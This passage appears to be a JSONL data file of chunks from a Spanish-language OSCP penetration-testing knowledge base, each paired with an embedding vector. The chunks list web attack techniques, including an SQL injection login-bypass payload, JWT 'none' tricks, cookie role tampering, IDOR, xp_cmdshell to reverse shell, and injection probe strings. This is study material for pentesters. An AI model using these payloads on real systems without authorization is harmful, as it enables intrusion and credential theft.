0.08001, 0.03991, 0.04141, -0.13859, -0.02439, 0.01878, 0.03003, -0.04608, 0.0343, 0.10227, -0.04073, 0.03606, 0.10551, 0.05374, 0.03495, 0.06215, 0.07971, 0.05168, 0.05362, -0.06339, 0.08356, -0.02086, -0.01974, -0.0369, -0.07068, -0.0631, -0.01152, 0.0288, -0.10359, -0.07783, -0.00151, 0.04036, -0.03581, 0.01057, 0.04134, 0.04886, -0.00465, 0.04126, -0.02938, 0.01829, 0.00178, -0.02501, 0.06379, 0.05086, 0.01822, -0.00349, -0.01301, 0.05873, -0.00352, -0.03966, -0.07128, 0.03876, 0.00827, -0.01822, 0.01601, -0.15576, -0.04853, -0.03491, 0.06106, 0.07672, 0.02346, 0.02158, -0.01959, 0.02503, -0.02813, -0.02891, 0.0216, 0.04021, -0.04514, -0.01634, 0.0572, 0.05753, 0.01595, -0.0062, -0.08183, -0.0331, 0.05298, 0.01054, 0.00849, 0.03717, -0.02962, -0.09297, -0.01037, -0.06177, -0.0252, 0.03344, -0.04876, -0.00372, -0.0076, -0.02651, 0.004, 0.02497, -0.00773, -0.02585, -0.00884, 0.04166, 0.0138, 0.04069, 0.03832, 0.01511, -0.02538, 0.0447, -0.00564, 0.00171, -0.02077, -0.06278, 0.0154, -0.0362, -0.06447, -0.01021, -0.05584, -0.02459, 0.03312, -0.03741, -0.04074, 0.01679, 0.04764, -0.01222, 0.0632, -0.03046, 0.00566, -0.02518, -0.0363, -0.02437, 0.03084, 0.02893, 0.01353, 0.01315, -0.05256, 0.05142, 0.0096, 0.01546, -0.03997, 0.02552, -0.003, -0.01115, 0.02004, 0.01928, -0.02082, 0.0143, 0.0138, -0.04387, 0.06221, 0.00604, -0.0215, -0.0231, -0.0141, -0.0559, -0.00338, -0.04868, -0.00572, 0.02024, -0.02003, -0.00901, -0.08351, 0.04682, -0.0093, -0.00658, -0.04075, -0.01308, -0.08208, -0.06469, 0.01522, -0.00979]} +{"tipo": "metodologia", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "texto": "## 3. Wordlists a medida\n```bash\ncewl http://IP -w custom.txt # palabras de la propia web", "v": [0.06402, -0.02044, -0.02907, -0.0451, -0.07109, -0.20042, 0.00387, -0.08243, 0.07748, 0.07113, -0.01013, -0.05041, 0.05776, -0.06165, -0.06069, 0.00574, 0.11095, -0.04834, 0.08266, -0.07831, 0.06844, 0.00783, -0.15174, -0.04387, -0.09468, -0.03426, -0.10987, 0.07692, -0.09873, 0.02084, -0.12758, -0.08434, -0.03022, -0.00641, -0.12195, 0.06911, -0.04452, 0.18649, -0.03818, 0.17024, -0.00833, 0.03931, -0.13151, 0.19846, 0.01781, -0.04364, -0.01876, -0.03046, -0.01633, -0.09586, -0.10413, -0.11111, 0.03042, 0.0746, -0.01042, -0.02512, 0.23636, -0.03817, -0.15597, -0.01314, -0.13379, 0.09762, -0.05554, -0.0477, 0.0207, 0.03896, -0.07278, 0.04327, -0.00614, 0.03755, 0.00831, -0.00213, -0.0367, -0.01639, 0.16577, -0.01303, -0.0282, -0.02, 0.04736, 0.02426, -0.06492, -0.09117, -0.05066, -0.02722, 0.01198, -0.05322, 0.03367, -0.16367, 0.00903, 0.01246, 0.08035, 0.01443, -0.05555, 0.00439, 0.01074, -0.12127, 0.0122, 0.01861, -0.00514, -0.00205, -0.00863, -0.01886, -0.06449, -0.0587, 0.08615, 0.0235, 0.00863, 0.12144, 0.00561, 0.02475, 0.08601, -0.01601, 0.07055, -0.08369, 0.0083, -0.10599, -0.03415, -0.05434, -0.00465, -0.09776, 0.01778, -0.10077, -0.00857, 0.04565, -0.06052, 0.0445, -0.0811, 0.06893, -0.08049, -0.03785, 0.08838, 0.02096, -0.00883, -0.12996, -0.02524, 0.06295, -0.05558, 0.02834, 0.00248, 0.05338, -0.0298, -0.04128, -0.10507, 0.03447, 0.06191, 0.00505, 0.02149, -0.04742, -0.11222, 0.06274, 0.02085, 0.06481, 0.07984, 0.0211, -0.06735, 0.01928, -0.00238, -0.02284, 0.02071, -0.00371, -0.0131, -0.01919, -0.03727, 0.0075, 0.02632, 0.04215, -0.06099, 0.0746, 0.04318, -0.01262, -0.0181, -0.02604, -0.01878, -0.03995, 0.02792, -0.02761, -0.02752, -0.00896, 0.00259, -0.06982, -0.05841, -0.02978, -0.0792, -0.07845, 0.03646, -0.00296, 0.12052, 0.02025, -0.04078, 0.01457, -0.00836, -0.01409, -0.06552, -0.01916, 0.09487, -0.02199, -0.07375, -0.03299, 0.03756, -0.09557, -0.03121, -0.03048, 0.04652, -0.05703, -0.01354, -0.00533, 0.01317, -0.02796, -0.03691, 0.0213, -0.01873, 0.01896, -0.02613, -0.00802, -0.01348, -0.04331, 0.01418, 0.03212, -0.01692, 0.01302, 0.01382, 0.07483, 0.0246, -0.03962, -0.02701, -0.0122, -0.00253, -0.04077, 0.03824, -0.01107, -0.0968, 0.02308, -0.01811, -0.02543, 0.03102, -0.03519, 0.03374, -0.00657, -0.01107, -0.07434, -0.01966, 0.06561, -0.03891, -0.03506, -0.0674, -0.03023, -0.0661, -0.02844, -0.03807, -0.00417, -0.07891, -0.04408, -0.03214, -0.01206, 0.02006, -0.04829]} +{"tipo": "metodologia", "herramienta": "Authentication attacks", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Authentication attacks.md", "texto": "## 4. Bypass (no fuerza bruta)\n- **SQLi en el login** → `' OR '1'='1'-- -` → SQL injection.\n- **Cookies/roles manipulables**: `isAdmin=false` → `true`, `role=user` → `admin` (en Burp Suite).\n- **JWT**: alg `none`, secreto débil (`jwt_tool`, crackeo con rockyou).\n- **IDOR**: cambia `?id=1` por `?id=2` y accedes a datos de otro.\n- **Cookie/sesión robada** vía XSS.\n\nRelacionado: Burp Repeater e Intruder · SQL injection · OSCP MOC", "v": [-0.0847, -0.18191, -0.12716, -0.03429, -0.00179, -0.28099, -0.04469, -0.03517, 0.02076, 0.04478, -0.1283, -0.16845, 0.09408, -0.09318, -0.05491, -0.15097, -0.01499, -0.00949, -0.09694, 0.10301, 0.05385, 0.02239, -0.00029, -0.0198, 0.02576, 0.12948, -0.04851, 0.08638, -0.10406, -0.05947, -0.01339, -0.1357, 0.00108, -0.07869, -0.0295, 0.04487, -0.04006, 0.08901, 0.02513, 0.12654, 0.00311, -0.0344, -0.09631, 0.18767, 0.11811, 0.0575, 0.0345, 0.07559, -0.01207, 0.00607, -0.00833, 0.00271, -0.10508, -0.00334, 0.02726, -0.08808, 0.13042, -0.01003, -0.05628, 0.03386, -0.00149, 0.10239, -0.09465, -0.04833, 0.0309, -0.02169, 0.09496, -0.1219, 0.06625, 0.13716, -0.07675, -0.04422, -0.07924, -0.1367, 0.07142, -0.08204, 0.12754, -0.02202, 0.09249, -0.00073, -0.11874, -0.05619, -0.06736, 0.05434, -0.00859, -0.00381, 0.17055, -0.05408, -0.05196, -0.00905, 0.15587, -0.0245, 0.04582, -0.03053, 0.05762, -0.0888, -0.0136, -0.01359, 0.05504, -0.03595, 0.03282, 0.06077, -0.03729, 0.116, 0.10224, 0.03664, 0.03962, -0.06028, 0.02122, -0.05476, 0.09151, -0.00683, 0.01982, -0.01471, 0.04225, 0.07821, -0.03764, 0.00416, -0.0264, -0.0099, -0.03151, -0.05044, -0.03359, 0.01657, -0.10601, -0.03772, -0.03032, 0.04907, 0.025, -0.01203, -0.06011, 0.01881, -0.0542, 0.03543, -0.04295, 0.02732, 0.08239, -0.03056, 0.0091, -0.03422, 0.02145, 0.00912, 0.05821, -0.00016, 0.03137, 0.06269, 0.06545, -0.00133, -0.05955, -0.00982, 0.07826, 0.04343, 0.06333, 0.05917, 0.04012, -0.05819, 0.0255, -0.08335, -0.03631, 0.00873, -0.01933, 0.06488, 0.01323, 0.04847, 0.0004, -0.04725, -0.02998, -0.08572, 0.02738, -0.04631, -0.02528, -0.00799, 0.00373, -0.0188, -0.00235, -0.01995, 0.00088, -0.05249, -0.02748, -0.05193, 0.07204, -0.04552, 0.0398, 0.03651, -0.02546, -0.05181, -0.01201, -0.01126, -0.0172, 0.00216, 0.03787, -0.02098, 0.01981, -0.0266, -0.03238, 0.02094, -0.02626, -0.03308, 0.05946, -0.01741, 0.01247, -0.03587, -0.02859, -0.01054, -0.01162, -0.0152, 0.0133, 0.00405, -0.06966, 0.01125, 0.03429, -0.01103, 0.01722, -0.03939, -0.03509, -0.0638, 0.00684, 0.05908, -0.0078, 0.02093, -0.05724, 0.07394, 0.04664, -0.00737, 0.00249, 0.03641, 0.04004, -0.0655, 0.0404, 0.04294, -0.04359, 0.01645, 0.00755, -0.0201, 0.03515, 0.0215, -0.01074, -0.00182, -0.03864, -0.07575, 0.0503, 0.07729, -0.02597, -0.04847, -0.06372, -0.05228, -0.09442, 0.05835, 0.03129, -0.01641, -0.05141, -0.04675, 0.01214, -0.06299, 0.02322, -0.02935]} +{"tipo": "metodologia", "herramienta": "SQL injection", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "texto": "# SQL injection\n\n> Aprende **manual primero** (en Burp Repeater e Intruder). `sqlmap` a veces miente — y en el examen está limitado (Reglas de herramientas). Vector de Hacking web.", "v": [-0.03926, -0.13277, -0.19728, -0.22481, 0.0487, -0.24719, -0.06156, -0.01792, 0.03457, -0.04568, -0.18422, -0.04542, 0.06662, -0.13107, 0.03292, 0.14907, -0.09046, -0.19681, 0.00312, 0.03292, 0.06484, 0.08857, -0.12762, 0.07573, -0.06494, 0.04199, -0.06294, 0.12782, -0.13231, 0.01465, -0.06754, 0.02062, -0.08179, -0.11994, -0.18009, -0.0773, 0.02514, 0.04439, 0.01591, 0.06994, -0.04436, 0.04143, -0.15524, 0.07014, 0.05773, 0.0048, 0.0784, 0.07018, -0.01861, 0.01077, -0.09496, -0.0066, -0.08663, -0.02821, -0.02751, -0.04737, 0.1342, 0.03078, 0.05651, -0.11814, 0.02671, 0.0098, -0.05811, -0.04876, 0.04147, 0.02063, 0.10178, -0.11858, -0.03016, 0.15891, -0.06215, 0.00726, -0.04069, -0.0667, -0.03449, -0.11585, 0.02249, 0.03725, 0.10016, -0.06462, -0.07751, -0.0612, -0.12343, 0.02853, 0.00903, -0.03062, 0.05158, 0.00378, 0.03365, -0.03086, 0.00321, 0.00684, 0.03977, 0.02571, 0.02664, -0.0995, 0.06928, -0.00502, -0.04211, -0.08567, 0.07001, -0.03579, -0.03146, 0.13242, 0.03387, 0.06142, 0.07711, 0.01384, -0.03888, -0.02953, 0.04716, 0.06744, -0.06459, -0.05109, -0.01718, -0.00228, 0.02248, 0.10697, -0.00748, -0.04812, -0.0304, -0.03282, -0.00105, 0.02023, -0.01879, 0.0146, -0.06053, 0.04961, 0.00179, -0.05368, -0.0171, 0.0098, -0.05828, -0.01529, -0.01883, 0.02999, -0.01528, -0.05623, -0.06571, -0.01873, -0.06685, 0.00655, -0.01752, -0.03841, 0.03101, 0.00942, 0.0307, -0.06241, -0.0797, -0.04625, -0.03571, 0.02666, 0.09837, 0.09645, -0.02522, -0.06738, 0.01164, -0.0541, 0.00688, 0.00802, -0.02664, 0.00651, 0.0138, 0.00809, 0.03976, 0.06321, -0.07416, -0.04924, 0.01175, 0.00095, 0.01531, 0.04557, 0.00357, -0.04491, 0.02876, -0.00595, -0.02608, -0.08763, -0.00795, -0.08165, 0.05065, 0.01455, -0.03749, 0.02499, 0.00717, -0.02873, -0.01033, 0.02757, 0.0323, 0.00886, 0.01017, 0.01113, -0.04736, -0.03256, 0.04279, 0.02782, -0.04161, -0.03005, -0.00054, -0.06771, -0.0382, -0.05645, -0.09186, -0.07058, -0.04345, 0.07959, -0.02556, 0.02103, -0.0558, -0.00344, 0.00687, 0.00523, 0.02653, -0.02851, -0.02481, -0.07296, 0.03115, 0.05043, -0.04394, -0.00423, 0.03668, 0.05876, 0.06605, -0.018, -0.02107, -0.03891, 0.0205, -0.00349, 0.03586, 0.02285, 0.02861, -0.01946, 0.01866, -0.03427, 0.04757, 0.0227, 0.02437, 0.02403, -0.02508, -0.04176, 0.06132, 0.0327, 0.01425, -0.0108, -0.03246, -0.04795, -0.01183, -0.00603, 0.00182, -0.03375, -0.02775, -0.03111, 0.0196, -0.04581, -0.02774, -0.01167]} +{"tipo": "metodologia", "herramienta": "SQL injection", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "texto": "## Bypass de login\n```\n' OR '1'='1'-- - (con espacio - doble guion - espacio)\n```", "v": [-0.03035, -0.07516, 0.00231, 0.02522, -0.06184, -0.2044, -0.01245, -0.02864, 0.0345, -0.0271, 0.01986, -0.07335, -0.0587, 0.02266, -0.03583, -0.07087, 0.08587, 0.04935, -0.15941, 0.13498, -0.0786, 0.12646, 0.01013, 0.03206, 0.07563, -0.04756, 0.03231, -0.08052, -0.11184, -0.02439, 0.05368, 0.04154, -0.00564, -0.14125, -0.05571, -0.1321, -0.00025, 0.11667, 0.01018, 0.16581, -0.06738, 0.02419, -0.05634, 0.19622, 0.06089, -0.07479, 0.11193, 0.12822, -0.06365, -0.06846, -0.06657, -0.04219, 0.07323, -0.00302, 0.08046, -0.07263, 0.18437, 0.03275, -0.06627, 0.02039, 0.06147, -0.02548, -0.00089, 0.01381, -0.0067, 0.07675, 0.05824, -0.02667, 0.01256, 0.16217, -0.09141, -0.02896, 0.01483, -0.00881, 0.05765, 0.00611, 0.02915, -0.14332, 0.06982, 0.15513, 0.03022, 0.01878, 0.01979, 0.03647, 0.01262, 0.00336, 0.08773, -0.00095, -0.08169, 0.01625, 0.01772, -0.00533, 0.05956, 0.0436, 0.08251, -0.08264, 0.01108, 0.06324, -0.01811, 0.00221, 0.07848, 0.0223, -0.15506, 0.04551, 0.04056, 0.05782, 0.03068, -0.0452, -0.04303, -0.09746, 0.09928, -0.02658, 0.04751, -0.06306, -0.05895, -0.00867, -0.02842, 0.00358, 0.11726, 0.02882, 0.01176, -0.00431, -0.08193, -0.0215, -0.07536, -0.07799, 0.04848, -0.0131, 0.07269, -0.09834, -0.10077, -0.02839, 0.01861, 0.02471, -0.00109, -0.01463, 0.02874, -0.0221, 0.03323, 0.04422, -0.01994, 0.02744, 0.03862, 0.09103, -0.06894, 0.00798, 0.01671, -0.0693, -0.10073, 0.06599, -0.0133, 0.05584, -0.01786, 0.04697, 0.06877, 0.03334, 0.0082, 0.01295, -0.00335, -0.09919, -0.00514, 0.10563, -0.01136, 0.06041, 0.0185, -0.07682, -0.07783, -0.07044, -0.01254, 0.00318, -0.06901, -0.07884, -0.07384, -0.00916, 0.03224, -0.08003, 0.07339, -0.04711, -0.03773, -0.01189, 0.03367, -0.07213, -0.03024, 0.07561, 0.00633, -0.09709, -0.01902, 0.03869, 0.06016, 0.1083, -0.02481, -0.02124, 0.00107, -0.06566, -0.13175, -0.06404, -0.03288, 0.04932, 0.08484, 0.06193, 0.00537, 0.02284, 0.02365, 0.03026, 0.04258, -0.06428, 0.00647, 0.0198, -0.04448, -0.03547, 0.0526, -0.12328, 0.01874, -0.00645, -0.06884, 0.0728, 0.00892, 0.00987, 0.02373, -0.03424, -0.00143, 0.02544, -0.05537, -0.00506, 0.04187, 0.05211, 0.0504, -0.05951, -0.01048, 0.02413, -0.02777, -0.01489, -0.01387, -0.01921, -0.00574, -0.02028, -0.00906, 0.01354, -0.05842, -0.06496, -0.01004, 0.06509, -0.02934, 0.03799, -0.02315, 0.00768, -0.04195, 0.04823, 0.04057, 0.02762, -0.02465, -0.04237, -0.00188, -0.05547, 0.05165, 0.01727]} +{"tipo": "metodologia", "herramienta": "SQL injection", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/SQL injection.md", "texto": "## De SQLi a shell\n- MSSQL: `xp_cmdshell` → RCE → Reverse shell.\n- Dump de tablas → credenciales → reutilización en otros servicios (Pass-the-Hash, RDP).\n- Lectura de ficheros (`LOAD_FILE`) → puede encadenar con LFI a RCE.", "v": [-0.09628, -0.26475, -0.06597, -0.04157, 0.03023, -0.1876, -0.05926, -0.05348, 0.04524, 0.16126, -0.09022, -0.12916, 0.00724, -0.25267, 0.09655, 0.04184, -0.15696, -0.00434, -0.11487, -0.10812, 0.02435, -0.06797, -0.20232, 0.0831, 0.05176, 0.0901, 0.05316, -0.06457, -0.02707, -0.14054, 0.09682, -0.03391, -0.11536, 0.02088, -0.05935, -0.01631, -0.00428, -0.01161, -0.03709, 0.06942, 0.01978, 0.06281, -0.19947, 0.12706, 0.0857, -0.11903, 0.05842, 0.05519, 0.07663, 0.00586, 0.006, -0.10971, -0.21271, -0.04895, 0.05614, 0.02351, 0.11119, 0.04207, -0.0393, 0.04129, -0.08127, 0.08057, 0.04749, -0.0734, 0.03492, 0.00653, 0.09655, -0.12847, -0.01763, 0.0868, -0.12059, -0.01048, -0.02085, -0.0565, -0.06811, -0.05628, 0.0949, -0.00633, 0.12239, 0.01904, -0.09721, -0.06273, -0.1079, 0.03693, 0.01211, -0.00015, 0.05776, -0.06597, -0.03526, 0.03878, 0.00137, -0.01298, -0.00269, 0.0466, 0.05783, -0.08289, -0.00925, -0.02104, -0.07212, -0.02345, -0.0465, 0.08543, 0.02503, 0.11212, 0.02607, -0.0164, 0.0507, 0.07089, 0.06079, 0.02794, 0.08879, -0.04545, -0.01844, -0.01537, -0.00941, 0.02, 3e-05, 0.01538, -0.04831, -0.0072, 0.06095, -0.02668, -0.00025, 0.01801, -0.0227, -0.0175, -0.04578, 0.06507, -0.0301, 0.0298, -0.04019, -0.00648, -0.04493, -0.00945, -0.02479, 0.02464, 0.01065, 0.01634, -0.02101, -0.04981, 0.02241, 0.04481, -0.04284, 0.07662, 0.05388, 0.01177, 0.08933, -0.0106, -0.04023, -0.00957, 0.06409, 0.05569, 0.05868, 0.00501, 0.02421, 0.02219, 0.04654, 0.0301, -0.0536, -0.00034, -0.00687, 0.04517, -0.02409, 0.03663, -0.02265, -0.01888, 0.04557, -0.02696, 0.03925, 0.00733, 0.00093, 0.03569, 0.00973, -0.06447, 0.04835, -0.0257, -0.02782, -0.08908, 0.01652, -0.03915, 0.01569, -0.06503, 0.0263, 0.023, -0.00082, -0.02444, -0.01993, -0.01441, -0.04596, -0.08081, -0.02733, 0.03301, -0.00597, -0.01113, -0.00104, -0.01409, -0.02338, -0.1161, -0.02746, -0.02724, -0.02228, 0.01469, -0.04617, -0.06331, 0.00386, -0.0196, -0.01974, 0.03739, -0.04254, -0.04533, 0.0063, 0.02946, 0.03636, -0.00138, 0.03259, -0.04593, 0.00531, 0.03849, 0.04433, -0.02114, -0.02481, 0.03193, 0.04865, 0.00215, -0.02212, 0.00448, 0.01815, -0.04158, 0.02651, -0.00567, 0.03061, 0.00637, 0.03928, -0.02308, 0.00278, -0.00962, -0.02392, -0.01972, 0.01995, -0.06291, 0.05274, 0.03057, 0.01616, -0.05594, 0.00146, 0.00179, -0.04479, 0.01572, 0.02251, -0.0054, -0.03908, -0.02042, -0.06263, -0.04221, -0.0506, 0.01745]} +{"tipo": "metodologia", "herramienta": "Hacking web", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "texto": "# Hacking web (metodología)\n\n> Cómo atacar una web paso a paso. En el OSCP, la web es el **foothold** más común de las máquinas standalone. Sub-índice de Enumeración dentro de la Metodología OSCP.", "v": [0.01509, -0.04867, -0.06225, -0.18003, -0.17806, -0.18526, -0.0447, 0.03463, -0.06937, 0.04019, -0.0997, -0.04863, 0.03239, 0.00985, 0.04329, 0.04863, 0.18028, -0.12636, 0.03194, -0.05793, -0.16181, 0.0201, -0.11557, 0.11405, 0.06339, 0.05685, -0.0573, 0.04617, -0.12976, -0.07459, -0.07576, 0.05862, -0.02737, 0.04603, -0.17214, -0.0466, -0.01307, -0.05381, 0.05001, 0.10999, -0.15779, 0.03973, -0.10181, 0.00721, 0.06472, -0.03942, 0.08244, 0.05409, 0.07926, 0.00855, -0.01797, -0.11904, -0.1342, -0.0356, -0.13502, -0.03394, 0.05282, 0.05723, -0.04851, -0.06646, 0.01402, 0.09443, -0.067, -0.04128, 0.04454, -0.09589, -0.06485, 0.00509, -0.06978, 0.06608, 0.07223, 0.05731, -0.09257, -0.02314, 0.15766, 0.00105, 0.06806, 0.09313, 0.18146, 0.00469, 0.03425, -0.07435, -0.05186, 0.02228, -0.10355, -0.03137, 0.09335, -0.08035, 0.01906, -0.14334, 0.0666, 0.04189, 0.01474, -0.0654, 0.00428, -0.12768, 0.0333, 0.03718, 0.02785, -0.0737, -0.00491, 0.01169, -0.08739, 0.05858, 0.013, 0.0684, 0.10714, 9e-05, -0.04345, -0.1295, 0.00179, 0.03164, -0.05601, -0.04681, -0.08393, -0.0244, 0.03873, 0.10026, -0.04498, -0.05455, -0.08078, 0.04349, -0.07485, -0.01408, -0.01869, -0.01415, 0.00664, 0.02898, 0.03159, -0.06392, -0.0376, -0.07142, -0.01868, 0.06626, -0.02135, -0.00296, -0.01821, -0.03126, 0.00262, 0.03192, 0.05498, 0.05003, -0.08944, -0.00362, -0.02207, -0.06513, 0.06422, -0.06491, -0.12188, -0.05985, 0.02902, 0.01012, 0.00176, 0.01954, -0.04645, -0.06668, -0.02715, -0.04467, -0.05808, 0.11258, -0.04636, 0.0052, -0.00529, 0.03504, -0.04064, 0.05652, 0.01156, 0.01374, -0.0431, -0.04171, 0.0507, 0.06684, 0.00747, -0.03524, 0.07813, -0.01855, -0.04576, -0.06264, 0.02144, 0.02427, 0.0096, -0.01118, 0.0429, -0.02277, -0.01054, 0.01783, 0.00095, 0.02997, -0.02695, 0.03173, 0.04383, -0.04315, -0.0549, 0.02282, 0.00139, 0.00196, -0.03303, 0.01732, 0.05494, -0.01529, -0.09884, -0.06422, -0.00234, -0.00524, 0.01216, 0.02971, 0.00637, -0.06187, -0.05516, 0.00817, -0.0109, -0.02408, 0.02081, -0.04808, -0.00395, -0.02845, -0.03806, 0.02809, -0.04671, -7e-05, 0.08819, -0.01336, 0.00958, 0.00135, -0.00582, 0.01615, -0.02382, -0.02417, 0.0149, -0.01176, -0.01027, -0.06708, 0.05764, -0.00769, 0.0165, 0.03577, 0.01891, -0.00055, -0.06844, -0.00306, -0.01233, -0.03684, 0.02085, -0.00526, -0.01425, -0.09979, -0.02665, -0.06907, 0.02873, -0.01716, -0.02104, -0.08072, -0.04718, 0.00353, -0.01242, 0.02383]} +{"tipo": "metodologia", "herramienta": "Hacking web", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "texto": "## El flujo\n```\n1. ENUMERAR → Enumeración web + Content discovery + Vhosts y subdominios\n2. MAPEAR superficie → cada input es un test: URL, params GET/POST, headers,\n cookies, formularios, uploads, JSON/API. Mapea con Burp Suite.\n3. IDENTIFICAR tecnología → whatweb, wappalyzer, headers, errores → searchsploit del CMS\n4. PROBAR cada vector (uno a uno):\n SQL injection (login, params, search)\n Command injection (params que ejecutan algo: ping, convert, export)\n Directory traversal (file=, path=, download=, page=)\n LFI a RCE / RFI (include de ficheros)\n File upload bypass (avatar, documento, import)\n XSS (reflejo en la página)\n SSTI ({{7*7}} en plantillas)\n Authentication attacks (default creds, fuerza bruta, bypass)\n5. EXPLOTAR → de RCE a Reverse shell → luego Privesc Linux / Privesc Windows\n```", "v": [0.02294, -0.14745, -0.1784, -0.26591, 0.07208, -0.15689, 0.04474, -0.11026, -0.02723, 0.01786, -0.11232, -0.11149, -0.04733, -0.07995, 0.11711, 0.02163, -0.00165, -0.07144, -0.06024, 0.02725, 0.00314, 0.0193, -0.18062, -0.08715, 0.0221, 0.13755, -0.06758, 0.02867, -0.08155, -0.05688, 0.09694, 0.02731, 0.01643, 0.00127, -0.10466, -0.06119, -0.08003, 0.02259, -0.04621, 0.2268, 0.04418, 0.08404, -0.14096, 0.13648, -0.02913, -0.10678, 0.02548, 0.05383, 0.09266, -0.06798, -0.00348, 0.00032, -0.18854, 0.03992, -0.04208, -0.06899, 0.14149, -0.09794, -0.00556, -0.0196, -0.05213, 0.03128, -0.00401, -0.04501, 0.03228, -0.04997, 0.00773, -0.08081, -0.05445, 0.06701, -0.08601, -0.02853, 0.0012, -0.12807, 0.04121, -0.03558, 0.00045, -0.01962, 0.10268, 0.1285, -0.03597, -0.08298, -0.10332, 0.02019, -0.02543, -0.07593, 0.00809, -0.08513, -0.02886, -0.02784, 0.14038, -0.02318, -0.03765, 0.03614, 0.00386, -0.03476, -0.00293, 0.00405, 0.04048, -0.01625, -0.01864, 0.03322, -0.08434, 0.10402, 0.09132, 0.04503, 0.0711, -0.06228, -0.00123, -0.00988, 0.07755, -0.00495, -0.04261, -0.07112, -0.02456, 0.04996, -0.04278, 0.017, 0.00074, -0.07868, -0.08732, -0.07858, -0.04154, -0.00539, -0.02525, -0.03867, -0.05494, 0.05979, 0.00179, -0.00509, 0.03959, 0.01733, -0.04622, 0.04989, -0.02658, 0.10089, 0.07652, -0.02188, 0.00491, -0.06455, 0.04206, 0.01367, 0.02214, 0.05157, 0.06777, 0.03317, 0.01933, -0.02319, -0.06922, -0.02544, -0.00201, 0.04009, 0.0213, -0.0149, -0.02308, -0.03887, 0.02373, -0.04363, 0.00409, 0.04737, -0.00286, 0.07438, -0.01027, 0.07484, -0.02837, -0.03137, -0.06316, -0.07272, 0.06275, 0.01306, -0.01831, 0.04033, -0.0573, -0.10466, 0.01676, 0.00225, -0.01594, -0.08081, 0.02642, -0.01638, -0.01137, -0.01917, -0.00691, 0.07708, -0.01759, -0.06537, 0.02894, -0.00454, 0.00484, -0.01364, 0.01363, 0.05221, -0.01415, 0.01314, -0.0045, 0.00795, -0.03814, -0.05321, -0.00653, -0.05492, -0.04396, -0.00075, -0.04474, -0.07955, -0.00529, 0.01054, -0.02826, -0.00273, -0.02926, -0.02481, -0.0055, -0.04662, 0.06316, -0.02562, -0.05213, -0.09772, 0.02897, 0.04051, -0.02233, 7e-05, -0.02827, 0.07372, 0.07789, -0.03835, 0.01607, 0.07228, 0.06057, -0.02089, 0.03363, 0.00357, -0.05384, 0.03309, -0.02152, -0.04626, 0.08675, 0.02711, 0.01753, -0.00708, -0.06616, -0.05087, 0.05356, 0.04389, -0.01744, -0.05539, -0.03303, -0.05214, -0.05872, 0.01444, 0.05065, -0.03219, -0.03992, 0.00017, -0.01073, -0.05352, 0.01364, -0.04665]} +{"tipo": "metodologia", "herramienta": "Hacking web", "perfil": "PENTESTERS", "tema": "explotacion web", "fichero": "conocimiento/02 - Explotacion web/Hacking web.md", "texto": "## La regla de oro web\n**Todo input es sospechoso.** Por cada parámetro, prueba: comilla `'`, `<`, `;`, `../`, `{{7*7}}`, `$(id)`. La página te dice por su reacción qué vector hay.", "v": [0.03864, 0.07912, -0.07436, 0.03878, 0.04014, -0.14258, 0.08218, -0.08667, 0.03897, -0.01935, -0.10715, -0.108, 0.03647, -0.0974, 0.00307, 0.02342, -0.04456, 0.04944, -0.01604, -0.06211, 0.09011, -0.09632, -0.13426, -0.15645, -0.05084, 0.06981, 0.02513, 0.06955, -0.09196, -0.04815, -0.04252, -0.03172, -0.02309, -0.0454, -0.11237, 0.0885, 0.01605, 0.01655, 0.04408, 0.19095, -0.05075, 0.01183, -0.0093, 0.05999, 0.03444, 0.0464, 0.01968, 0.00234, -0.0793, -0.05942, -0.03086, 0.05575, -0.03729, -0.02474, 0.02127, -0.06169, 0.04004, 0.07204, 0.02193, -0.01989, 0.07825, -0.00796, -0.01642, -0.06436, 0.02455, 0.05041, 0.03136, -0.12882, 0.05283, -0.03972, -0.06463, -0.03711, -0.12089, -0.07964, 0.12265, -0.04511, 0.09621, -0.03001, 0.01913, 0.07689, -0.15168, -0.05162, 0.00776, -0.00792, 0.0435, -0.03365, 0.07237, -0.11591, 0.01164, 0.00634, 0.13034, -0.02046, 0.01089, -0.05211, -0.09989, -0.1263, -0.00264, 0.06782, 0.08714, 0.00658, 0.09356, -0.02383, -0.04097, 0.01666, 0.04816, 0.04222, 0.00659, 0.04022, -0.02043, -0.09592, 0.15168, 0.00648, -0.01276, -0.08781, -0.03265, 0.12998, -0.02219, 0.05813, 0.00194, -0.04967, -0.00162, 0.01079, -0.0279, -0.00966, 0.04336, -0.05134, 0.00094, 0.00929, -0.00386, 0.07821, 0.02363, -0.00563, -0.1006, -0.04481, 0.00369, 0.07033, 0.01303, -0.00026, 0.04533, 0.0119, 0.05884, 0.02393, 0.01553, 0.0621, 0.04381, -0.01386, 0.02989, -0.06828, -0.13114, 0.01366, -0.03011, 0.08887, 0.00194, 0.00991, -0.02175, -0.0666, 0.03703, -0.07919, 0.00489, -0.03599, 0.03791, 0.09639, 0.04656, 0.09021, -0.04951, -0.1034, -0.08354, -0.11467, 0.02426, -0.05591, -0.0399, 0.04758, -0.10419, -0.05826, 0.00837, 0.01877, -0.05965, -0.07846, -0.02706, -0.07809, 0.02749, 0.06392, -0.04794, 0.09362, -0.06016, -0.01165, 0.07941, -0.082, -0.01771, 0.06147, 0.04489, -0.05424, -0.0558, 0.07961, 0.03602, 0.00793, -0.01143, -0.06841, 0.05798, -0.08047, -0.02471, -0.02012, -0.00715, -0.01803, 0.03719, 0.04729, -0.04454, 0.00481, -0.02144, 0.03829, -0.01707, -0.07971, -0.00742, -0.08431, -0.04622, -0.02069, 0.03672, 0.03214, -0.04238, -0.00645, -0.01261, 0.08144, 0.04037, 0.02417, -0.01124, 0.11853, 0.00022, -0.05073, 0.12559, 0.01934, -0.07967, -0.00599, -0.01512, -0.06938, 0.05607, -0.03601, 0.0277, -0.05969, -0.18312, -0.08663, -0.05575, 0.03941, -0.08527, -0.01186, 